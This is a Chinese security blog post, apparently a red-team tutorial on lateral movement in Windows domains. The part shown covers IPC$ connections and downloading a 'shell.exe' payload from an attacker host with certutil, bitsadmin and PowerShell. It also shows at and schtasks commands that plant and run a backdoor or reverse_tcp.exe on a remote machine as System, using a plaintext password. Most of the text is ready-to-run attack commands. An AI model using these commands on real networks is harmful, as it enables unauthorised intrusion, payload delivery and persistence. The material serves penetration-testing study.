<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="内网渗透（八）横向移不动"><meta name="keywords" content="内网渗透,渗透测试"><meta name="author" content="uf9n1x,1916003479@qq.com"><meta name="copyright" content="uf9n1x"><title>内网渗透（八）横向移不动 | Uf9n1x's Blog</title><link rel="shortcut icon" href="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Uf9n1x's Blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E4%B8%AD%E7%9A%84%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93"><span class="toc-number">1.</span> <span class="toc-text">横向移动中的文件传输</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E6%96%87%E4%BB%B6%E5%85%B1%E4%BA%AB-IPC"><span class="toc-number">1.0.1.</span> <span class="toc-text">通过文件共享-IPC</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8B-IPC-%E5%B8%B8%E8%A7%81%E7%9A%84%E9%94%99%E8%AF%AF%E4%BB%A3%E7%A0%81"><span class="toc-number">1.0.1.1.</span> <span class="toc-text">建立 IPC 常见的错误代码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8B-IPC-%E5%A4%B1%E8%B4%A5%E7%9A%84%E5%8E%9F%E5%9B%A0"><span class="toc-number">1.0.1.2.</span> <span class="toc-text">建立 IPC 失败的原因</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E6%90%AD%E5%BB%BASMB%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-number">1.0.2.</span> <span class="toc-text">通过搭建SMB服务器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87Windows%E8%87%AA%E5%B8%A6%E5%B7%A5%E5%85%B7"><span class="toc-number">1.0.3.</span> <span class="toc-text">通过Windows自带工具</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Certutil"><span class="toc-number">1.0.3.1.</span> <span class="toc-text">Certutil</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#BITSAdmin"><span class="toc-number">1.0.3.2.</span> <span class="toc-text">BITSAdmin</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#powershell"><span class="toc-number">1.0.3.3.</span> <span class="toc-text">powershell</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#at-amp-schtasks-amp-sc%E6%A8%AA%E5%90%91"><span class="toc-number">2.</span> <span class="toc-text">at &amp; schtasks &amp; sc横向</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%B5%81%E7%A8%8B"><span class="toc-number">2.0.1.</span> <span class="toc-text">利用流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#at%EF%BC%88%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%EF%BC%89"><span class="toc-number">2.0.2.</span> <span class="toc-text">at（计划任务）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#schtasks%EF%BC%88%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%EF%BC%89"><span class="toc-number">2.0.3.</span> <span class="toc-text">schtasks（计划任务）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UNC%E8%B7%AF%E5%BE%84%E5%8A%A0%E8%BD%BD%E6%89%A7%E8%A1%8C"><span class="toc-number">2.0.4.</span> <span class="toc-text">UNC路径加载执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sc%EF%BC%88%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%EF%BC%89"><span class="toc-number">2.0.5.</span> <span class="toc-text">sc（系统服务）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%B9%E9%87%8F%E5%88%A9%E7%94%A8%E8%84%9A%E6%9C%AC%E3%80%81%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C%E7%88%86%E7%A0%B4%E8%BF%9E%E6%8E%A5"><span class="toc-number">2.0.6.</span> <span class="toc-text">批量利用脚本、工具进行爆破连接</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SMB%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">SMB协议利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#psexec"><span class="toc-number">3.1.</span> <span class="toc-text">psexec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#smbexec"><span class="toc-number">3.2.</span> <span class="toc-text">smbexec</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%B0%83%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">远程桌面调用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#RDP-Hijack"><span class="toc-number">4.1.</span> <span class="toc-text">RDP Hijack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sharp-RDP"><span class="toc-number">4.2.</span> <span class="toc-text">sharp RDP</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WMI%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text">WMI的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">5.0.1.</span> <span class="toc-text">常规利用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="toc-number">5.0.2.</span> <span class="toc-text">常见利用工具</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A5%97%E4%BB%B6impacket-WmiExec"><span class="toc-number">5.0.2.1.</span> <span class="toc-text">套件impacket-WmiExec</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%87%AA%E5%B8%A6-cscript-%E6%98%8E%E6%96%87%E4%BC%A0%E9%80%92-%E6%9C%89%E5%9B%9E%E6%98%BE"><span class="toc-number">5.0.2.2.</span> <span class="toc-text">自带 cscript 明文传递 有回显</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%87%AA%E5%B8%A6-WMIC-%E6%98%8E%E6%96%87%E4%BC%A0%E9%80%92-%E6%97%A0%E5%9B%9E%E6%98%BE"><span class="toc-number">5.0.2.3.</span> <span class="toc-text">自带 WMIC 明文传递 无回显</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WMI%E4%BA%8B%E4%BB%B6%E8%AE%A2%E9%98%85%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">5.0.3.</span> <span class="toc-text">WMI事件订阅的利用</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DCOM%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">6.</span> <span class="toc-text">DCOM的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#MMC20-Application"><span class="toc-number">6.1.</span> <span class="toc-text">MMC20.Application</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ShellWindows"><span class="toc-number">6.2.</span> <span class="toc-text">ShellWindows</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Excel-Application"><span class="toc-number">6.2.1.</span> <span class="toc-text">Excel.Application</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ShellBrowserWindow"><span class="toc-number">6.2.2.</span> <span class="toc-text">ShellBrowserWindow</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Impacket%E9%87%8C%E7%9A%84dcomexec-py%E8%84%9A%E6%9C%AC"><span class="toc-number">6.2.3.</span> <span class="toc-text">Impacket里的dcomexec.py脚本</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WinRM%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">7.</span> <span class="toc-text">WinRM的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%9A%E8%BF%87WinRM%E6%89%A7%E8%A1%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4"><span class="toc-number">7.1.</span> <span class="toc-text">通过WinRM执行远程命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Winrs"><span class="toc-number">7.2.</span> <span class="toc-text">Winrs</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Winrm-cmd"><span class="toc-number">7.3.</span> <span class="toc-text">Winrm.cmd</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Evil-Winrm"><span class="toc-number">7.4.</span> <span class="toc-text">Evil-Winrm</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PTH-amp-PTK-amp-PTT%EF%BC%88hash%E3%80%81key%E3%80%81ticket%E4%BC%A0%E9%80%92%EF%BC%89"><span class="toc-number">8.</span> <span class="toc-text">PTH&amp;PTK&amp;PTT（hash、key、ticket传递）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#PTH"><span class="toc-number">8.1.</span> <span class="toc-text">PTH</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Mimikatz%E8%BF%9B%E8%A1%8CPTH"><span class="toc-number">8.1.1.</span> <span class="toc-text">利用Mimikatz进行PTH</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8impacket%E8%BF%9B%E8%A1%8CPTH"><span class="toc-number">8.1.2.</span> <span class="toc-text">利用impacket进行PTH</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PTK-aes256-%E4%BC%A0%E9%80%92"><span class="toc-number">8.2.</span> <span class="toc-text">PTK aes256 传递</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PTT-%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92"><span class="toc-number">8.3.</span> <span class="toc-text">PTT 票据传递</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/avator3.JPG"></div><div class="author-info__name text-center">uf9n1x</div><div class="author-info__description text-center">websec</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/uf9n1x">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">46</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">37</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">35</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Some links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.cnblogs.com/uf9n1x/">博客园</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.yuque.com/uf9n1x">语雀</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://music.163.com/">Music</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Uf9n1x's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">内网渗透（八）横向移不动</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-04-23</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/Redteam/">Redteam</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">6.9k</span><span class="post-meta__separator">|</span><span>阅读时长: 25 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>这篇文章介绍内网渗透种的横向移动。</p>
<span id="more"></span>

<p> 在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最终可能获得域控制器的访问权限，甚至完全控制基于Windows操作系统的整个内网环境，控制域环境下的全部机器。  </p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304231725113.png" alt="img"></p>
<h1 id="横向移动中的文件传输"><a href="#横向移动中的文件传输" class="headerlink" title="横向移动中的文件传输"></a>横向移动中的文件传输</h1><h3 id="通过文件共享-IPC"><a href="#通过文件共享-IPC" class="headerlink" title="通过文件共享-IPC"></a>通过文件共享-IPC</h3><p>执行net share命令，可以获得Windows默认开启的网络共享，其中C$为C盘共享，ADMIN$为系统目录共享，还有一个IPC$共享。</p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304231725763.png" alt="img"></p>
<p>IPC（Internet Process Connection）是共享”命令管道”的资源，为了让进程间通信而开放的命令管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。</p>
<p>实战中往往会建立IPC$连接，因为通过IPC$连接，不仅可以进行所有文件共享操作，还可以实现其他远程管理操作，如列出远程主机进程、在远程主机上创建计划任务或服务等。<br><strong>建立IPC$连接需要具备以下两个条件：</strong></p>
<p><strong>①远程主机开启了IPC连接</strong></p>
<p><strong>②远程主机的139端口和445端口开放</strong></p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">IPC$ 连接</span></span><br><span class="line">net use \\192.168.1.131\ipc$					# 建立空连接</span><br><span class="line">net use \\192.168.1.131\ipc$ "password" /user:"Administrator"	# 建立非空连接</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">IPC$ 使用</span></span><br><span class="line">net use                               # 查看本机建立的连接(本机连接其他机器)</span><br><span class="line">net session                           # 查看本机建立的连接(其他机器连接的本机)，需要administrator用户执行</span><br><span class="line">net share                             # 查看本地开启的共享</span><br><span class="line">net share ipc$                        # 开启ipc$共享</span><br><span class="line">net share ipc$ /del                   # 删除ipc$共享</span><br><span class="line">net share admin$ /del                 # 删除admin$共享</span><br><span class="line">net share c$ /del                     # 删除C盘共享</span><br><span class="line">net use * /del                        # 删除所有连接</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">IPC$ 连接建立之后的操作</span></span><br><span class="line">dir \\192.168.1.131\c$								# 列出目标文件目录</span><br><span class="line">copy C:\\Users\Administrator\Desktop\whatever.exe \\192.168.1.131\c$\aaa # 将文件复制到目标C盘aaa目录下</span><br><span class="line">type \\192.168.1.131\c$\1.txt		# 查看目标C盘下1.txt文件内容</span><br><span class="line">net use h: \\192.168.52.138\c$				# 磁盘映射，将目标的 C 盘映射到本地的 H 盘</span><br><span class="line">net use h: /del 											# 删除磁盘映射</span><br></pre></td></tr></tbody></table></figure>



<h4 id="建立-IPC-常见的错误代码"><a href="#建立-IPC-常见的错误代码" class="headerlink" title="建立 IPC 常见的错误代码"></a>建立 IPC 常见的错误代码</h4><figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限 </span><br><span class="line">51：网络问题，Windows 无法找到网络路径</span><br><span class="line">53：找不到网络路径，可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题</span><br><span class="line">67：找不到网络名，本地 Lanmanworkstation 服务未启动，目标删除 ipc$</span><br><span class="line">1219：提供的凭据和已存在的凭据集冲突，说明已建立 IPC$，需要先删除</span><br><span class="line">1326：账号密码错误</span><br><span class="line">1792：目标 NetLogon 服务未启动，连接域控常常会出现此情况</span><br><span class="line">2242：用户密码过期，目标有账号策略，强制定期更改密码</span><br></pre></td></tr></tbody></table></figure>

<h4 id="建立-IPC-失败的原因"><a href="#建立-IPC-失败的原因" class="headerlink" title="建立 IPC 失败的原因"></a>建立 IPC 失败的原因</h4><p>（1）目标系统不是 NT 或以上的操作系统</p>
<p>（2）对方没有打开 IPC$共享</p>
<p>（3）对方未开启 139、445 端口，或者被防火墙屏蔽</p>
<p>（4）输出命令、账号密码有错误</p>
<h3 id="通过搭建SMB服务器"><a href="#通过搭建SMB服务器" class="headerlink" title="通过搭建SMB服务器"></a>通过搭建SMB服务器</h3><p>SMB（Server Message Block，服务器消息块），又称CIFS（Common Internet File System，网络文件共享系统），主要功能是使网络上的计算机能够共享计算机文件、打印机、串行端口和通信等资源。SMB消息一般使用NetBIOS协议或TCP发送，分别使用端口139或445，目前倾向于使用445端口。</p>
<p>在linux上，可以通过 <a target="_blank" rel="noopener" href="https://github.com/fortra/impacket/blob/master/impacket/smbserver.py">https://github.com/fortra/impacket/blob/master/impacket/smbserver.py</a> 来搭建smb服务器。</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mkdir /root/smbshare python smbserver.py mysmb /root/smbshare -smb2support</span><br></pre></td></tr></tbody></table></figure>

<h3 id="通过Windows自带工具"><a href="#通过Windows自带工具" class="headerlink" title="通过Windows自带工具"></a>通过Windows自带工具</h3><h4 id="Certutil"><a href="#Certutil" class="headerlink" title="Certutil"></a><strong>Certutil</strong></h4><p>Certutil 是Windows自带的命令行工具，用于管理Windows证书并作为证书服务器的一部分安装。Certutil提供了从网络下载文件的功能。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">certutil <span class="literal">-urlcache</span> <span class="operator">-split</span> <span class="operator">-f</span> http://<span class="number">192.168</span>.<span class="number">1.1</span>:<span class="number">8000</span>/shell.exe c:\users\public\shell.exe </span><br><span class="line">//从<span class="number">192.168</span>.<span class="number">1.1</span>:<span class="number">8000</span>下载shell.exe到本地c:\users\public\目录下</span><br></pre></td></tr></tbody></table></figure>

<h4 id="BITSAdmin"><a href="#BITSAdmin" class="headerlink" title="BITSAdmin"></a><strong>BITSAdmin</strong></h4><p>BITSAdmin用于创建、下载和上传作业，监视其进度。Windows7及以后的系统自带BitsAdmin工具。</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer test http://<span class="number">192.168</span>.<span class="number">1.1</span>:<span class="number">8000</span>/<span class="number">1</span>.txt c:\users\mytools\a.txt </span><br><span class="line">// 创建一个名为test的bitsadmin任务，从<span class="number">192.168</span>.<span class="number">1.1</span>:<span class="number">8000</span>下载<span class="number">1</span>.txt,保存为c:\users\mytools\a.txt</span><br></pre></td></tr></tbody></table></figure>

<h4 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a><strong>powershell</strong></h4><p>通过创建WebClient对象来实现文件下载</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">(<span class="built_in">New-Object</span> Net.WebClient).DownloadFile(<span class="string">"http://192.168.1.1:8000/shell.exe"</span>, <span class="string">"c:\users\public\shell.exe"</span>) </span><br><span class="line">powershell <span class="literal">-c</span> <span class="string">"(New-Object Net.WebClient).DownloadFile('http://192.168.1.1:8000/shell.exe','c:\users\public\shell.exe')"</span></span><br></pre></td></tr></tbody></table></figure>

<h1 id="at-amp-schtasks-amp-sc横向"><a href="#at-amp-schtasks-amp-sc横向" class="headerlink" title="at &amp; schtasks &amp; sc横向"></a>at &amp; schtasks &amp; sc横向</h1><p>在拿下一台内网主机后，通过本地信息搜集收集用户凭证等信息后，如何横向渗透拿下更多的主机？</p>
<p>使用 at&amp;schtasks 命令，创建计划任务，在已知目标系统的用户明文密码的基础上，直接可以在远程主机上执行命令。</p>
<p><strong>获取到某域主机权限-&gt;minikatz 得到密码（明文，hash）-&gt;用到信息收集里面域用户的列表当做用户名字典-&gt;用到密码明文当做密码字典-&gt;尝试连接-&gt;创建计划任务(at|schtasks)-&gt;执行文件可为后门或者相关命令</strong></p>
<h3 id="利用流程"><a href="#利用流程" class="headerlink" title="利用流程"></a>利用流程</h3><p>\1. 建立 IPC 链接到目标主机</p>
<p>\2. 拷贝要执行的命令脚本到目标主机</p>
<p>\3. 查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本</p>
<p>\4. 删除 IPC 链接</p>
<p>ps: <strong>Windows Server 2012 以后的版本没有at命令，只有schtasks命令</strong></p>
<h3 id="at（计划任务）"><a href="#at（计划任务）" class="headerlink" title="at（计划任务）"></a>at（计划任务）</h3><p>利用过程如下：</p>
<figure class="highlight shell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">net time \\192.168.1.131</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看时间</span></span><br><span class="line">at \\192.168.1.131 10:30 cmd.exe /c "whoami &gt; c:\result.txt"</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">结果输出到 result 下</span></span><br><span class="line">type \\192.168.1.131\c$\result.txt</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看执行结果</span></span><br><span class="line">at \\192.168.1.131 1 /delete</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">删除计划任务，1是任务号</span></span><br><span class="line">copy hack.bat \\192.168.1.131\c$\Windows\Temp</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">上传 bat 脚本</span></span><br><span class="line">net time \\192.168.1.131														</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看时间</span></span><br><span class="line">at \\192.168.1.131 19:48 c:\Windows\Temp\hack.bat</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">创建定时任务，执行木马脚本</span></span><br><span class="line">at \\192.168.1.131                           									</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">查看任务列表</span></span><br></pre></td></tr></tbody></table></figure>

<h3 id="schtasks（计划任务）"><a href="#schtasks（计划任务）" class="headerlink" title="schtasks（计划任务）"></a>schtasks（计划任务）</h3><p>操作步骤：</p>
<ol>
<li>利用已建立的IPC连接上传后门程序</li>
<li>利用已建立的IPC连接或指定用户凭据的方式在远程主机上创建计划任务shell</li>
</ol>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 192.168.1.131 /TN Backdoor /SC minute /MO 1 /TR C:\users\pubilc\reverse_tcp.exe /RN System /F # /S 指定要连接的系统； /TN 指定计划任务的名称 # /SC 指定计划任务执行频率；  /MO 指定计划任务执行周期 # /TR 指定计划任务执行程序；  /RU 指定计划任务运行的用户权限 # /F  如果指定的任务已存在，则强制创建</span><br></pre></td></tr></tbody></table></figure>

<p>如果没有建立IPC连接，则需要指定远程主机的用户凭据</p>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S <span class="number">192.168</span>.<span class="number">1.131</span> /TN Backdoor /<span class="built_in">SC</span> minute /MO <span class="number">1</span> /TR C:\users\pubilc\reverse_tcp.exe /RN System /F /U Administrator /P <span class="number">123</span>qwe<span class="selector-tag">@</span></span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>创建完成后，可以等待计划任务自行执行，也可以立即启动计划任务shell</li>
</ul>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /RUN /S <span class="number">192.168</span>.<span class="number">1.131</span> /I /TN Backdoor</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>查看计划任务shell</li>
</ul>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /query /S <span class="number">192.168</span>.<span class="number">1.131</span> /TN Backdoor</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>删除计划任务shell</li>
</ul>
<figure class="highlight powershell"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Delete /S <span class="number">192.168</span>.<span class="number">1.131</span> /TN Backdoor /F</span><br></pre></td></tr></tbody></table></figure>

<p>也可以通过计划任务执行系统命令，将执行结果写入文件，然后使用type命令查看文件</p>
